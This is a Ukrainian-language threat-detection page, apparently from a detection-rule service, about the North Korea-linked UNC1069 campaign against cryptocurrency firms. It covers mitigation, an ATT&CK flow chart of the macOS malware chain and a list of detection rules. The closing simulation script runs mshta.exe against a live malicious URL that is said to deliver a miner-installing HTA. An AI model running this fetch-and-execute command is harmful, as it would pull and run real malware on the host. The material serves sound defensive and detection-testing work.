UNC1069 націлюється на сектор криптовалют з новими інструментами та соціальною інженерією на базі штучного інтелекту
Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
ПОВ’ЯЗАНА З ПІВНІЧНОЮ КОРЕЄЮ UNC1069 націлилася на криптовалютну фінансову технологію за допомогою багатоступеневого вторгнення, яке поєднувало AI-створене відео-деепфейк, скомпрометовані облікові записи Telegram та фальшиву Zoom-зустріч для підштовхування жертв до виконання зловмисних команд.
Розслідування
Mandiant виявив сім родин зловмисного програмного забезпечення на macOS хосту, включаючи нові SILENCELIFT, DEEPBREATH і CHROMEPUSH, а також відомий завантажувач SUGARLOADER. Ланцюжок почався з команди в стилі ClickFix, яка отримувала завантаження з зловмисного домену, потім проходила через завантажувачі та бекдори, які крали облікові дані, дані браузера та вміст повідомлень. Пізніші етапи використовували модульне виконання в пам’яті для мінімізації слідів на диску.
Пом’якшення
Посилити верифікацію в соціально-інженерних каналах, обмежити виконання непідписаних скриптів та моніторити аномальне використання curl або mshta. На macOS застосовуйте контроль підписування коду та демонів запуску, перевіряйте дозволи TCC і каталоги хостів рідного обміну повідомленнями на наявність невідомих файлів.
Відповідь
Ізолювати кінцеву точку, зберегти артефакти командного рядка, отримати шкідливий plist демон запуску та блокувати всі виявлені домени C2. Скинути ключі облікового запису, облікові дані браузера і Telegram, а також провести перевірку на залишкові завантажувачі. Перегляньте уражені облікові записи на предмет несанкціонованого доступу та координуйте стримування.
"graph TB %% Визначення класів classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#99ff99 %% Вузли action_initial_access["<b>Дія</b> – <b>T1204.001 Виконання користувачем</b>: Зловмисне посилання надіслано через скомпрометований обліковий запис Telegram і підроблену Zoom зустріч<br/><b>Опис</b>: Жертва скопіювала та виконала команди"] class action_initial_access action tool_telegram["<b>Інструмент</b> – <b>Назва</b>: Telegram (скомпрометовано)<br/><b>Роль</b>: Канал доставлення зловмисного посилання"] class tool_telegram tool tool_zoom["<b>Інструмент</b> – <b>Назва</b>: Zoom (підроблена зустріч)<br/><b>Роль</b>: Вектор соціальної інженерії"] class tool_zoom tool action_execution_unix_shell["<b>Дія</b> – <b>T1059.004 Unix Shell</b>: Виконати команду curl через zsh для завантаження WAVESHAPER<br/><b>Опис</b>: Завантажує та виконує бекдор"] class action_execution_unix_shell action tool_curl["<b>Інструмент</b> – <b>Назва</b>: curl<br/><b>Призначення</b>: Отримання віддаленого завантаження"] class tool_curl tool malware_waveshaper["<b>Зловмисне ПЗ</b> – <b>Назва</b>: WAVESHAPER<br/><b>Функція</b>: Бекдор, завантажений та виконаний"] class malware_waveshaper malware action_execution_mshta["<b>Дія</b> – <b>T1218.005 Виконання через проксі Mshta</b>: Використовуйте mshta для отримання та запуску завантажувача HYPERCALL"] class action_execution_mshta action tool_mshta["<b>Інструмент</b> – <b>Назва</b>: mshta<br/><b>Призначення</b>: Виконання віддаленого HTML застосунку"] class tool_mshta tool malware_hypercall["<b>Зловмисне ПЗ</b> – <b>Назва</b>: HYPERCALL<br/><b>Функція</b>: Завантажувач, виконаний через mshta"] class malware_hypercall malware process_launch_daemon["<b>Процес</b> – <b>T1543.004 Демон запуску</b>: com.apple.system.updater<br/><b>Призначення</b>: Запускає SUGARLOADER при запуску системи"] class process_launch_daemon process malware_sugarloader["<b>Зловмисне ПЗ</b> – <b>Назва</b>: SUGARLOADER<br/><b>Функція</b>: Складова для постійності"] class malware_sugarloader malware action_defense_evasion["<b>Дія</b> – <b>T1027.004 Компілювання після доставки</b>: Шифрує конфігурацію за допомогою RC4 для приховування URL-адрес C2"] class action_defense_evasion action malware_deepbreath["<b>Зловмисне ПЗ</b> – <b>Назва</b>: DEEPBREATH<br/><b>Можливості</b>: Доступ до Keychain і сховищ браузера"] class malware_deepbreath malware action_cred_keychain["<b>Дія</b> – <b>T1555.001 Keychain</b>: Витяг облікових даних з macOS Keychain"] class action_cred_keychain action action_cred_browser["<b>Дія</b> – <b>T1555.003 Веб-браузери</b>: Витяг файлів cookie, даних входу, розширень з Chrome Brave Edge"] class action_cred_browser action malware_chromepush["<b>Зловмисне ПЗ</b> – <b>Назва</b>: CHROMEPUSH<br/><b>Здатність</b>: Розширення браузера кейлоггер"] class malware_chromepush malware action_keylogging["<b>Дія</b> – <b>T1056.001 Кейлогінг</b>: Фіксація натискань клавіш через зловмисне розширення"] class action_keylogging action action_local_staging["<b>Дія</b> – <b>T1074.001 Локальна підготовка даних</b>: Зберегти зібрані дані в тимчасових каталогах"] class action_local_staging action action_remote_staging["<b>Дія</b> – <b>T1074.002 Віддалена підготовка даних</b>: Завантажити підготовлені дані до C2 за допомогою curl"] class action_remote_staging action action_c2_http["<b>Дія</b> – <b>T1102.003 Веб-служба Oneu2011Way</b>: Відправка ексфільтрованих даних через HTTP POST"] class action_c2_http action action_exfiltration["<b>Дія</b> – <b>T1020 Автоматизована ексфільтрація</b>: Автоматичне завантаження даних на сервери C2"] class action_exfiltration action %% З’єднання action_initial_access –>|використовує| tool_telegram tool_telegram –>|доставляє посилання до| tool_zoom tool_zoom –>|веде до| action_execution_unix_shell action_execution_unix_shell –>|виконує| tool_curl tool_curl –>|завантажує| malware_waveshaper malware_waveshaper –>|активує| action_defense_evasion action_initial_access –>|також активує| action_execution_mshta action_execution_mshta –>|використовує| tool_mshta tool_mshta –>|отримує| malware_hypercall malware_hypercall –>|встановлює| process_launch_daemon process_launch_daemon –>|запускає| malware_sugarloader malware_sugarloader –>|завантажує| malware_deepbreath malware_deepbreath –>|виконує| action_cred_keychain malware_deepbreath –>|виконує| action_cred_browser malware_deepbreath –>|встановлює| malware_chromepush malware_chromepush –>|виконує| action_keylogging action_keylogging –>|зберігає дані в| action_local_staging action_local_staging –>|завантажує через curl до| action_remote_staging action_remote_staging –>|відправляє дані до| action_c2_http action_c2_http –>|сприяє| action_exfiltration %% Призначення класів class action_initial_access,action_execution_unix_shell,action_execution_mshta,action_defense_evasion,action_cred_keychain,action_cred_browser,action_keylogging,action_local_staging,action_remote_staging,action_c2_http,action_exfiltration action class tool_telegram,tool_zoom,tool_curl,tool_mshta tool class malware_waveshaper,malware_hypercall,malware_sugarloader,malware_deepbreath,malware_chromepush malware class process_launch_daemon process "
Потік атаки
Детекції
Можлива спроба переліку System_profiler (через створення процесу)
Перегляд
Підозріла поведінка ухилення від захисту через LOLBAS MSHTA шляхом виявлення пов’язаних команд (через створення процесу)
Перегляд
Можлива спроба переліку оновлень системи (через створення процесу)
Перегляд
Підозріла спроба виконання Curl [MacOS] (через cmdline)
Перегляд
PnPtUtil для переліку пристроїв (через cmdline)
Перегляд
Можливий перелік системи (через cmdline)
Перегляд
ІОС-и (HashMd5) для виявлення: UNC1069 цікавиться сектором криптовалют з новими інструментами та соціальною інженерією з підтримкою AI
Перегляд
ІОС-и (HashSha256) для виявлення: UNC1069 цікавиться сектором криптовалют з новими інструментами та соціальною інженерією з підтримкою AI
Перегляд
Вектор зараження UNC1069 MacOS через ClickFix [Створення процесу в Linux]
Перегляд
Команда виконання атаки UNC1069 ClickFix [Створення процесу в Windows]
Перегляд
Виконання симуляції
Передумова: Телеметрія і базове порівняння повинні бути успішними.
Раціонал: у цьому розділі детально описано точне виконання техніки супротивника (TTP), призначеної для активації правила виявлення. Команди та наратив МУТЬ напряму відображати виявлені TTPи та мають генерувати саме ту телеметрію, яку очікує логіка виявлення.
-
Наратив атаки та команди:
Агресор, здобувши початковий плацдарм через фішинговий електронний лист, використовуєmshtaдля завантаження зловмисного HTML застосунку зhttps://mylingocoin.com/audio/fix/6454694440. Цей файл HTA містить PowerShell навантаження, яке встановлює майнер криптовалют. Перед запуском HTA нападник виконуєsetx audio_volume 100для того, щоб гарантувати, що аудіопідсистема перебуває в відомому стані (деякі варіанти кампанії ClickFix маніпулюють налаштуваннями аудіо, щоб приховати спливаючі вікна). Обидві команди виконуються безпосередньо в консолі PowerShell, створюючи поля CommandLine, які точно відповідають правилу Sigma. -
Сценарій регресивного тесту:
# Симуляція атаки UNC1069 ClickFix — активує Sigma правило # Крок 1: Зберегти незначний варіант змінної середовища (відповідає виявленню) setx audio_volume 100 # Крок 2: Виконати зловмисний HTA — точна URL-адреса, використана у виявленні правила $maliciousUrl = "https://mylingocoin.com/audio/fix/6454694440" Start-Process -FilePath "mshta.exe" -ArgumentList $maliciousUrl # Опціонально: зачекайте кілька секунд, щоб HTA запустився Start-Sleep -Seconds 5 -
Команди очистки:
# Видаліть раніше встановлену змінну середовища reg delete "HKCUEnvironment" /v "audio_volume" /f # Зупиніть будь-які з процесів mshta, що залишилися після тесту Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force